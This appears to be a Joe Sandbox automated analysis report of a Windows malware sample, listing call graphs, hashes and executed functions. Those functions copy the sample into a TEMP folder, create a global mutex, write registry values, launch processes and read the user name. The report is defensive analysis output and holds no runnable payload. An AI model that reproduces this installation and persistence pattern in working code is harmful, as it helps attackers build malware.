5d1820 std::_Throw_Cpp_error 43 API calls 23648->23649 23650 5d7ac9 23649->23650 23650->23650 23651 5d1820 std::_Throw_Cpp_error 43 API calls 23650->23651 23652 5d7ce3 23651->23652 23787 5d9eb0 23652->23787 23654 5d7d08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23655 5d1820 std::_Throw_Cpp_error 43 API calls 23654->23655 23656 5d7f39 23655->23656 23657 5d1820 std::_Throw_Cpp_error 43 API calls 23656->23657 23658 5d7fb6 23657->23658 23659 5d9c00 27 API calls 23658->23659 23660 5d7fdb 23659->23660 23661 5d6420 27 API calls 23660->23661 23662 5d801f 23661->23662 23663 5d1820 std::_Throw_Cpp_error 43 API calls 23662->23663 23664 5d81bd 23663->23664 23664->23664 23665 5d1820 std::_Throw_Cpp_error 43 API calls 23664->23665 23666 5d83b3 23665->23666 23667 5d9eb0 4 API calls 23666->23667 23668 5d83de std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23667->23668 23669 5d1290 std::_Throw_Cpp_error 25 API calls 23668->23669 23670 5d8496 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23669->23670 23671 5d1820 std::_Throw_Cpp_error 43 API calls 23670->23671 23672 5d8590 23671->23672 23673 5d1820 std::_Throw_Cpp_error 43 API calls 23672->23673 23674 5d8729 23673->23674 23675 5d1820 std::_Throw_Cpp_error 43 API calls 23674->23675 23676 5d87a6 23675->23676 23677 5d63c0 27 API calls 23676->23677 23678 5d87bd 23677->23678 23679 5d6420 27 API calls 23678->23679 23683 5d87d6 23679->23683 23680 5d1290 std::_Throw_Cpp_error 25 API calls 23681 5d8889 23680->23681 23682 5d1290 std::_Throw_Cpp_error 25 API calls 23681->23682 23685 5d8894 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23682->23685 23683->23680 23684 5d8b24 23684->23597 23686 5d8b54 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23684->23686 23685->23684 23688 5d8960 23685->23688 23687 5d1290 std::_Throw_Cpp_error 25 API calls 23686->23687 23689 5d8b84 23687->23689 23690 5d4740 std::_Throw_Cpp_error 43 API calls 23688->23690 23692 5f0a3c 23689->23692 23691 5d8ac8 23690->23691 23691->23569 23695 5f0a41 23692->23695 23694 5ecc05 23709 5f7f3b 30 API calls 3 library calls 23694->23709 23695->23694 23698 5d1790 Concurrency::cancel_current_task 23695->23698 23812 5f8083 23695->23812 23822 5f9778 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23695->23822 23697 5f0a67 23697->23697 23698->23697 23821 5f1930 RaiseException 23698->23821 23700 5d17ac 23701->23367 23703 5e48d0 23702->23703 23705 5e490c 23702->23705 23704 5d1820 std::_Throw_Cpp_error 43 API calls 23703->23704 23706 5e4905 23704->23706 23707 5d1820 std::_Throw_Cpp_error 43 API calls 23705->23707 23706->23369 23708 5e4a25 23707->23708 23708->23369 23709->23361 23825 5f7ddf 45 API calls 2 library calls 23709->23825 23710->23371 23711->23387 23712->23389 23713->23395 23714->23397 23715->23403 23716->23405 23717->23411 23718->23413 23719->23419 23720->23421 23722 5d6463 23721->23722 23723 5d6528 23722->23723 23724 5d65a0 23722->23724 23728 5d6468 _Yarn 23722->23728 23826 5d17c0 16 API calls std::_Facet_Register 23723->23826 23827 5d17b0 27 API calls std::_Throw_Cpp_error 23724->23827 23728->23425 23729 5d6552 _Yarn 23729->23425 23733 5d1836 _Yarn 23730->23733 23734 5d185e 23730->23734 23731 5d1907 23830 5d17b0 27 API calls std::_Throw_Cpp_error 23731->23830 23733->23500 23734->23731 23828 5d17c0 16 API calls std::_Facet_Register 23734->23828 23737 5d18a7 _Yarn 23740 5d18e9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23737->23740 23829 5f4e4f 25 API calls __Getctype 23737->23829 23740->23500 23747->23528 23748->23528 23749->23528 23750->23528 23751->23528 23752->23528 23753->23528 23754->23528 23755->23528 23831 5f659c 23756->23831 23759->23528 23760->23528 23764 5d9c19 23763->23764 23765 5d9dd0 23763->23765 23767 5d9dd5 23764->23767 23769 5d9cc7 23764->23769 23773 5d9c2e _Yarn 23764->23773 23806 5d62a0 27 API calls 23765->23806 23807 5d17b0 27 API calls std::_Throw_Cpp_error 23767->23807 23805 5d17c0 16 API calls std::_Facet_Register 23769->23805 23773->23557 23774 5d9d0e _Yarn 23775 5d9d7f _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23774->23775 23808 5f4e4f 25 API calls __Getctype 23774->23808 23775->23557 23777 5d31df 23776->23777 23781 5d31b2 _Yarn 23776->23781 23778 5d31ee 23777->23778 23779 5d32db 23777->23779 23809 5d17c0 16 API calls std::_Facet_Register 23778->23809 23810 5d17b0 27 API calls std::_Throw_Cpp_error 23779->23810 23781->23581 23785 5d3235 _Yarn 23786 5d3292 _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23785->23786 23811 5f4e4f 25 API calls __Getctype 23785->23811 23786->23581 23788 5d9ebc 23787->23788 23789 5d9ebe RegOpenKeyExA 23787->23789 23788->23789 23790 5d9f0c 23789->23790 23791 5d9ed6 RegSetValueExA 23789->23791 23790->23654 23793 5d9f06 RegCloseKey 23791->23793 23794 5d9f10 RegCloseKey 23791->23794 23793->23790 23794->23654 23796 5d63cf 23795->23796 23797 5d9c00 27 API calls 23796->23797 23798 5d63dd 23797->23798 23799 5d63a0 23798->23799 23800 5d6420 27 API calls 23799->23800 23801 5d63b4 23800->23801 23801->23577 23805->23774 23809->23785 23813 60097d 23812->23813 23814 6009bb 23813->23814 23815 6009a6 HeapAlloc 23813->23815 23819 60098f __Getctype 23813->23819 23824 5f8b26 14 API calls __dosmaperr 23814->23824 23817 6009b9 23815->23817 23815->23819 23818 6009c0 23817->23818 23818->23695 23819->23814 23819->23815 23823 5f9778 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23819->23823 23821->23700 23822->23695 23823->23819 23824->23818 23826->23729 23828->23737 23832 5f65bc 23831->23832 23833 5f65aa 23831->23833 23850 5f6443 23832->23850 23843 5f1554 GetModuleHandleW 23833->23843 23836 5f65af 23836->23832 23844 5f6642 GetModuleHandleExW 23836->23844 23838 5f65f5 23838->23528 23843->23836 23845 5f6684 23844->23845 23846 5f6661 GetProcAddress 23844->23846 23847 5f668a FreeLibrary 23845->23847 23848 5f65bb 23845->23848 23849 5f6676 23846->23849 23847->23848 23848->23832 23849->23845 23851 5f644f __FrameHandler3::FrameUnwindToState 23850->23851 23866 5f800d EnterCriticalSection 23851->23866 23853 5f6459 23867 5f64af 23853->23867 23855 5f6466 23871 5f6484 23855->23871 23858 5f6600 23876 5fff7d GetPEB 23858->23876 23861 5f662f 23864 5f6642 __InternalCxxFrameHandler 3 API calls 23861->23864 23862 5f660f GetPEB 23862->23861 23863 5f661f GetCurrentProcess TerminateProcess 23862->23863 23863->23861 23865 5f6637 ExitProcess 23864->23865 23866->23853 23869 5f64bb __FrameHandler3::FrameUnwindToState 23867->23869 23868 5f651c __InternalCxxFrameHandler 23868->23855 23869->23868 23874 5fbb99 14 API calls __InternalCxxFrameHandler 23869->23874 23875 5f8055 LeaveCriticalSection 23871->23875 23873 5f6472 23873->23838 23873->23858 23874->23868 23875->23873 23877 5fff97 23876->23877 23879 5f660a 23876->23879 23880 5fd1ee 5 API calls __Getctype 23877->23880 23879->23861 23879->23862 23880->23879 24405 607291 40 API calls std::_Locinfo::_Locinfo_dtor 24308 604496 18 API calls 4 library calls 24309 5f0ca4 45 API calls __RTC_Initialize 24407 5f0ea4 23 API calls __InternalCxxFrameHandler 24359 5f15a3 47 API calls _unexpected

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 005D65F0 Relevance: 50.8, APIs: 13, Strings: 14, Instructions: 3518synchronizationprocessfileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,Global\,00000007,?,?), ref: 005D67F1
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 005D6871
                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 005D6893
                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,0000000F,?,00000000,0060E898,00000001,?,?,?,?), ref: 005D6B82
                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 005D6B96
                                                                                                                                                                                            • CopyFileA.KERNEL32(?,00000000,00000000), ref: 005D6E2E
                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00000000,?), ref: 005D790D
                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005D791C
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 005D792B
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 005D7930
                                                                                                                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 005D8C04
                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104,00000001,00000006), ref: 005D8C7F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Create$CloseEnvironmentFileHandleVariable$CopyDirectoryErrorExecuteLastModuleMutexNameObjectProcessShellSingleWait
                                                                                                                                                                                            • String ID: " /F$Global\$TEMP$XFZ@$XFZ@7$XFZ@i6$XFZ@i6$XFZ@i6$XFZ@i6$``$open$wuC$wuC$wuC
                                                                                                                                                                                            • API String ID: 747220738-3486709996
                                                                                                                                                                                            • Opcode ID: 2f955d230f0261ebd0980c472d602a6bf24f329f5d89a28a117140492db83416
                                                                                                                                                                                            • Instruction ID: ead1130a7a568b55406621a02a421554e64aaf2c219b35eee90648c6817f0380
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f955d230f0261ebd0980c472d602a6bf24f329f5d89a28a117140492db83416
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF630476D206598AEB17CB38C8417E9FBB5BFA6340F14D75BE40472662FB3166C68B00
                                                                                                                                                                                            Function 005E98AE Relevance: 28.3, APIs: 4, Strings: 9, Instructions: 5538COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                            • String ID: !yW$7<=<I$@FSYM_;$XSZ]A_;$ctx`9$dszm9$fyyq9$wytpj:$z}7
                                                                                                                                                                                            • API String ID: 3677997916-2810526515
                                                                                                                                                                                            • Opcode ID: abdd1223bd1cad5f7a37e851491785c0d5f9524159b4326db942c6ac2eae9b2d
                                                                                                                                                                                            • Instruction ID: 971e10f50ff96a3e2085dd97e3801cc20f67083211173c24820fa8255ab49c9a
                                                                                                                                                                                            • Opcode Fuzzy Hash: abdd1223bd1cad5f7a37e851491785c0d5f9524159b4326db942c6ac2eae9b2d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 68B32A35C246994BE717CB79C8166DAF778AF67380F10D3ABE44472662FB3166C28B04
                                                                                                                                                                                            Function 005F6600 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1687 5f6600-5f660d call 5fff7d 1690 5f662f-5f663b call 5f6642 ExitProcess 1687->1690 1691 5f660f-5f661d GetPEB 1687->1691 1691->1690 1692 5f661f-5f6629 GetCurrentProcess TerminateProcess 1691->1692 1692->1690
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,005F65FF,00000001,00000000,?,00000001,?,005FCD85), ref: 005F6622
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,005F65FF,00000001,00000000,?,00000001,?,005FCD85), ref: 005F6629
                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 005F663B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                            • Opcode ID: b7e69ca7cfb17c9e19350e4061fda7c0fa2e6c2db54cc08e2309806ead619385
                                                                                                                                                                                            • Instruction ID: d7c9d13d7a60663547310902716d2635b0db053fa1cc0d5b43cafccc66840e67
                                                                                                                                                                                            • Opcode Fuzzy Hash: b7e69ca7cfb17c9e19350e4061fda7c0fa2e6c2db54cc08e2309806ead619385
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E0B631080118ABCF116B64DD5D96A7F6AFB45741F105814FA05C6531CB7ADD92CB90
                                                                                                                                                                                            Function 005E48B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1728 5e48b0-5e48ce GetUserNameA 1729 5e490c-5e491b 1728->1729 1730 5e48d0-5e48ed 1728->1730 1732 5e49ec-5e4a09 1729->1732 1733 5e4921-5e492a 1729->1733 1731 5e48f0-5e48f5 1730->1731 1731->1731 1734 5e48f7-5e490b call 5d1820 1731->1734 1737 5e4a10-5e4a15 1732->1737 1735 5e49c0-5e49ea 1733->1735 1736 5e4930-5e49bd 1733->1736 1735->1732 1735->1735 1736->1732 1737->1737 1739 5e4a17-5e4a2b call 5d1820 1737->1739
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 005E48C6
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                            • String ID: A
                                                                                                                                                                                            • API String ID: 2645101109-3554254475
                                                                                                                                                                                            • Opcode ID: 5130fba2f4134e3b84b76188a9b85538bbf668b77effae8f1a592c4823896356
                                                                                                                                                                                            • Instruction ID: fd6a25021966aa3f405c9b2e301460f7290bb7c0dde58171d7ebe1831ec096af
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5130fba2f4134e3b84b76188a9b85538bbf668b77effae8f1a592c4823896356
                                                                                                                                                                                            • Instruction Fuzzy Hash: BC4159759146558FEB0ACF78D8113E6BB78EF12384F00CB5DE891B7652E732624A8B40
                                                                                                                                                                                            Function 0060ADAF Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1594 60adaf-60addf call 60aafd 1597 60ade1-60adec call 5f8b13 1594->1597 1598 60adfa-60ae06 call 605ab0 1594->1598 1603 60adee-60adf5 call 5f8b26 1597->1603 1604 60ae08-60ae1d call 5f8b13 call 5f8b26 1598->1604 1605 60ae1f-60ae53 call 60aa68 1598->1605 1614 60b0d4-60b0d8 1603->1614 1604->1603 1611 60ae58-60ae68 1605->1611 1612 60aed5-60aede GetFileType 1611->1612 1613 60ae6a-60ae73 1611->1613 1618 60aee0-60af11 GetLastError call 5f8af0 CloseHandle 1612->1618 1619 60af27-60af2a 1612->1619 1616 60ae75-60ae79 1613->1616 1617 60aeaa-60aed0 GetLastError call 5f8af0 1613->1617 1616->1617 1623 60ae7b-60aea8 call 60aa68 1616->1623 1617->1603 1618->1603 1633 60af17-60af22 call 5f8b26 1618->1633 1621 60af33-60af39 1619->1621 1622 60af2c-60af31 1619->1622 1626 60af3d-60af8b call 6059fb 1621->1626 1627 60af3b 1621->1627 1622->1626 1623->1612 1623->1617 1636 60afaa-60afd2 call 60a815 1626->1636 1637 60af8d-60af99 call 60ac77 1626->1637 1627->1626 1633->1603 1643 60afd4-60afd5 1636->1643 1644 60afd7-60b018 1636->1644 1637->1636 1645 60af9b 1637->1645 1646 60af9d-60afa5 call 5fdb0e 1643->1646 1647 60b039-60b047 1644->1647 1648 60b01a-60b01e 1644->1648 1645->1646 1646->1614 1650 60b0d2 1647->1650 1651 60b04d-60b051 1647->1651 1648->1647 1649 60b020-60b034 1648->1649 1649->1647 1650->1614 1651->1650 1653 60b053-60b086 CloseHandle call 60aa68 1651->1653 1657 60b088-60b0b4 GetLastError call 5f8af0 call 605bc3 1653->1657 1658 60b0ba-60b0ce 1653->1658 1657->1658 1658->1650
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0060AA68: CreateFileW.KERNELBASE(00000000,00000000,?,0060AE58,?,?,00000000,?,0060AE58,00000000,0000000C), ref: 0060AA85
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0060AEC3
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0060AECA
                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 0060AED6
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0060AEE0
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0060AEE9
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0060AF09
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0060B056
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0060B088
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0060B08F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4237864984-0
                                                                                                                                                                                            • Opcode ID: 699bf22834cf3e1d8bf44015e803800525256651f1d91e15e7b076fa57167246
                                                                                                                                                                                            • Instruction ID: 49d71ce4c6a37202fe6a17ffa17a58db431c1b190f7b7e68341f146a26f114f9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 699bf22834cf3e1d8bf44015e803800525256651f1d91e15e7b076fa57167246
                                                                                                                                                                                            • Instruction Fuzzy Hash: 17A13732A442158FDF2D9FA8DC557EF3BA2AB46360F14015DE812AB3D1DB358912CB52
                                                                                                                                                                                            Function 005D9DE0 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1663 5d9de0-5d9df4 1664 5d9df8-5d9e11 RegOpenKeyExA 1663->1664 1665 5d9df6 1663->1665 1666 5d9e4b-5d9e65 1664->1666 1667 5d9e13-5d9e21 1664->1667 1665->1664 1668 5d9e25-5d9e43 RegQueryValueExA 1667->1668 1669 5d9e23 1667->1669 1670 5d9e45 RegCloseKey 1668->1670 1671 5d9e66-5d9e89 RegCloseKey 1668->1671 1669->1668 1670->1666 1672 5d9e90-5d9e95 1671->1672 1672->1672 1673 5d9e97-5d9eae call 5d1820 1672->1673
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?), ref: 005D9E09
                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,000000FF), ref: 005D9E38
                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 005D9E45
                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 005D9E66
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Close$OpenQueryValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1607946009-0
                                                                                                                                                                                            • Opcode ID: de4bc7d75e187013814a8f86b8bbb098c6ac7b2b1b6f9a9176d7c6ea66ebaf6e
                                                                                                                                                                                            • Instruction ID: 9eecadf8355ff3bd49448fe08dc3d9f0bb7bcc2ec3eaa836f432b1c13885bc1b
                                                                                                                                                                                            • Opcode Fuzzy Hash: de4bc7d75e187013814a8f86b8bbb098c6ac7b2b1b6f9a9176d7c6ea66ebaf6e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 32216F7410021AEFEB34DF18DC48BA67BB9FF05704F00459EE9568B291D7B2A958CBA1
                                                                                                                                                                                            Function 005D9EB0 Relevance: 6.0, APIs: 4, Instructions: 43registryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1676 5d9eb0-5d9eba 1677 5d9ebc 1676->1677 1678 5d9ebe-5d9ed4 RegOpenKeyExA 1676->1678 1677->1678 1679 5d9f0c-5d9f0f 1678->1679 1680 5d9ed6-5d9ee0 1678->1680 1681 5d9ee4-5d9eeb 1680->1681 1682 5d9ee2 1680->1682 1683 5d9eed 1681->1683 1684 5d9eef-5d9f04 RegSetValueExA 1681->1684 1682->1681 1683->1684 1685 5d9f06 RegCloseKey 1684->1685 1686 5d9f10-5d9f19 RegCloseKey 1684->1686 1685->1679
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000002,?), ref: 005D9ECC
                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,00000010,?), ref: 005D9EF9
                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 005D9F06
                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 005D9F10
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Close$OpenValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3951040859-0
                                                                                                                                                                                            • Opcode ID: d9ae0257e4cb1ed463b0cc5b858a790e3918f99fe9117e41aa8b3c87ff5bd6c1
                                                                                                                                                                                            • Instruction ID: 2700c171645360ac855a9467aee1d71974c9ea0bc57c8d8fcdc6efcc6774cc0e
                                                                                                                                                                                            • Opcode Fuzzy Hash: d9ae0257e4cb1ed463b0cc5b858a790e3918f99fe9117e41aa8b3c87ff5bd6c1
                                                                                                                                                                                            • Instruction Fuzzy Hash: EE012830240205EFEF18CF14D889F663B6AFB44705F50895AF5168F2A1D7B2ED51CBA0
                                                                                                                                                                                            Function 0060AD21 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1743 60ad21-60ad55 call 6042f4 call 5f93c7 1748 60ad57-60ad5a 1743->1748 1749 60ad5c-60ad71 call 60adaf 1743->1749 1750 60ad7b-60ad7f 1748->1750 1752 60ad76-60ad79 1749->1752 1753 60ad81-60ad89 call 5fce37 1750->1753 1754 60ad8a-60ad8e 1750->1754 1752->1750 1753->1754
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
